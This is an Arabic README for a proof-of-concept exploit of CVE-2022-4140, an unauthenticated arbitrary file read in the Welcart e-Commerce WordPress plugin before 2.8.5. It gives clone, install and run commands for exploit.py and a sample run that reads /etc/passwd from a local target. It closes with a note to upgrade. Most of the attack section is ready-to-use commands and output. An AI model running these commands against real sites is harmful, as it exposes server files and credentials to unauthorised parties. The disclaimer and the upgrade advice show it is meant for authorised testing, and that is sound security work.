
WordPress plugin Welcart e-Commerce < 2.8.5 - قراءة ملفات تعسفية
يحتوي هذا المستودع على برهان مفهوم (PoC) لاستغلال ثغرة CVE-2022-4140.
هذا المشروع مُقدَّم لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها.
لا تتحقق الإضافة من مدخلات المستخدم قبل استخدامها لإخراج محتوى ملف، مما قد يسمح لمهاجم غير مصادق بقراءة ملفات تعسفية على الخادم.
| المكوّن | الإصدار |
|---|
| الإضافة الثغرة | <=2.8.4 |
| الإضافة المُصحَّحة | 2.8.5 |
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt
python exploit.py <base_url> -f <file location> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Checking if target is vulnerable
[+] Plugin version detected: 2.8.4
[+] The target is vulnerable
[*] Attempting to read arbitrary file
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
قم بترقية الإضافة إلى الإصدار 2.8.5.